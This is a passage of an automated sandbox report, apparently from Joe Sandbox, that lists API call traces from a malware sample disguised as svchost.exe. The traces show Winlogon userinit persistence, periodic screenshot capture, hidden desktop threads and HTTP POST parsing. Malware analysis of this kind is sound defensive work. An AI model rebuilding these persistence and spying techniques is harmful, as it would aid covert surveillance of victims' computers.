                                                                                                                                                                                                                Function 02BCF2D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 109sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280), ref: 02BCF2F7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF33B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF347
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF34B
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF35C
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF363
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BCF390
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF39F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF3A5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF3A9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF3BA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF3C1
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BCF3EF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BCF405
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617D7280$scrs
                                                                                                                                                                                                                • API String ID: 1455050916-804494941
                                                                                                                                                                                                                • Opcode ID: 278c5534c24003da89556fc08e986113e5fc214ecce2c82b5279aaafde6b34c6
                                                                                                                                                                                                                • Instruction ID: cdfff29c576b3314fc9af61887cf14929964b5a0856a5c98428e9c4dd98ea997
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 278c5534c24003da89556fc08e986113e5fc214ecce2c82b5279aaafde6b34c6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E313B319442185BCB60DB789C48BEABBE9FF55740F5489D9E6C6D3100DFB0D984CBA0
                                                                                                                                                                                                                Function 02BD4A10 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 175registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,755730D0,00000000), ref: 02BD4A43
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,75690180), ref: 02BD4A6D
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4A8D
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4ABA
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BD4ABE
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BD4B60
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: RtlFreeHeap.NTDLL(00000000), ref: 02BC41D1
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BD4B71
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BD4B7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 579956326-2103896814
                                                                                                                                                                                                                • Opcode ID: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                                • Instruction ID: fe181f4181763507234f3d90ad90dc1570fb569b6feec572c21d97e65abb377d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D512935600306FFEB208B649C98FFABBB9EF84744F1045C4FA46AB204E7719A19C790
                                                                                                                                                                                                                Function 02BB8320 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BB833C
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB8343
                                                                                                                                                                                                                • SetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB834F
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                                  • Part of subcall function 02BBDA20: LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                                  • Part of subcall function 02BBDC50: memset.MSVCRT ref: 02BBDC69
                                                                                                                                                                                                                  • Part of subcall function 02BBDC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02BBDC82
                                                                                                                                                                                                                  • Part of subcall function 02BD9F50: malloc.MSVCRT ref: 02BD9F62
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02BB83E7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02BB83F5
                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,fuck), ref: 02BB83FF
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75570F10), ref: 02BC4FE7
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75570F10), ref: 02BC5045
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                                  • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02BB84A2
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84B1
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84E0
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB84EF
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB84FD
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02BB8506
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,00000000), ref: 02BB854C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                                • String ID: P0Wu$SYSTEM!114127!0296CDC0$fuck
                                                                                                                                                                                                                • API String ID: 379441473-1759176567
                                                                                                                                                                                                                • Opcode ID: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                                • Instruction ID: 9200360f6d42992ab1240cb64c26fc71e4e4743ce43689578d6a31305b38b746
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6051B2759403419FD7619F68D888FF63BE9EF44354F094AE9E6584B2A2C7B0E814CF60
                                                                                                                                                                                                                Function 02BD2390 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d77e0), ref: 02BD23B7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD23F9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD2405
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2409
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD241A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD2421
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2452
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD2458
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD245C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD246D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD2474
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD24A2
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD24B8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617d77e0$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1783372702
                                                                                                                                                                                                                • Opcode ID: b751ada994057206b71382bb6c06f76089aaf06b43ef00d91b3178f800991f4f
                                                                                                                                                                                                                • Instruction ID: 039b84eca5393c7aaa50577c57f38712708685db3ee5709faa95087eac17814f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b751ada994057206b71382bb6c06f76089aaf06b43ef00d91b3178f800991f4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 163138319442595BDB60DB789C58BEABBE8EF55740F8884D4EEC5D3101EBB0E984CBA0
                                                                                                                                                                                                                Function 02BD1320 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D70E0), ref: 02BD1347
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD1389
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD1395
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD1399
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13AA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD13B1
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD13E2
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD13E8
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD13EC
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13FD
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD1404
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD1432
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD1448
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617D70E0$scrs
                                                                                                                                                                                                                • API String ID: 224938940-3764988107
                                                                                                                                                                                                                • Opcode ID: 699e56b2bd9c3b97adb651014f87aa0debfda8946b40ca4795133e6d3663bf71
                                                                                                                                                                                                                • Instruction ID: 5ca896b11fe54b8ab98e8da4e254acc1cd6c460cbf46334fcef58177eadb7f82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 699e56b2bd9c3b97adb651014f87aa0debfda8946b40ca4795133e6d3663bf71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15312C319442195BDB60DB7D9C58BEABBE8EF55750F8884D4EA89D3100EB70E984CBA0
                                                                                                                                                                                                                Function 02BD3080 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD30A7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD30E9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD30F5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD30F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD310A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3111
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3142
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD3148
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD314C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD315D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3164
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD3192
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD31A8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617D7752$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1259098354
                                                                                                                                                                                                                • Opcode ID: bff228b0edc0b80704684d1d1c6f87c44d78326aac28a2cf8badb507add1a0cc
                                                                                                                                                                                                                • Instruction ID: c7de85fa62b177ae635585667fc570b96f4bf437418619f4dfdcad7e4658cb19
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bff228b0edc0b80704684d1d1c6f87c44d78326aac28a2cf8badb507add1a0cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F316931D402195BCB60CB789C58BEABBE8EF55740F8848D4EA85D3101EBB0E9C4CFA1
                                                                                                                                                                                                                Function 02BD31C0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3277
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3291
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 505831200-465362393
                                                                                                                                                                                                                • Opcode ID: 0cab0555e026edf769a59949181a245f276d9f1881620c746b6627671b7cc057
                                                                                                                                                                                                                • Instruction ID: ff859a45a5d056cd9978ac2d0f3cee82835e8d13f95d120a51b98ccdcdc10604
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cab0555e026edf769a59949181a245f276d9f1881620c746b6627671b7cc057
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E111E230AC57027BF26067649C0AF9F77D8AF04B94F508684FB95B61C1ABE0A5008FB7
                                                                                                                                                                                                                Function 02BC5090 Relevance: 27.1, APIs: 18, Instructions: 133memorynetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000C10,75573050,755730D0,75573080), ref: 02BC50B7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC50BA
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC50CE
                                                                                                                                                                                                                • inet_addr.WS2_32(?), ref: 02BC50F5
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5113
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC511D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC5120
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC512D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC5130
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02BC5148
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC514F
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC515F
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5175
                                                                                                                                                                                                                • htons.WS2_32(00000000), ref: 02BC51A1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51D1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC51D4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51E4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC51E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1718479325-0
                                                                                                                                                                                                                • Opcode ID: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                                • Instruction ID: 6e514c3344c575edd749ffb42520ed2c35e8343a5d71cc48deea61e86315ee8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9441C372A40304ABDB309F65DC4CF9E7B68EF44790FA58658FA45A7280DB71E580CBA0
                                                                                                                                                                                                                Function 02BC5200 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC5250
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC527C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,0000001C,0000001C), ref: 02BC52A3
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000005), ref: 02BC52D4
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC52FD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02BC5315
                                                                                                                                                                                                                • StrToIntA.SHLWAPI(-00000010), ref: 02BC5323
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004), ref: 02BC5355
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                                • String ID: $Content-Length: $POST
                                                                                                                                                                                                                • API String ID: 2509092961-2076583852
                                                                                                                                                                                                                • Opcode ID: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                                • Instruction ID: 2093565485bbcdd62a37dcd30fffe1f093fe504661ac3e54558abb05b9390df4
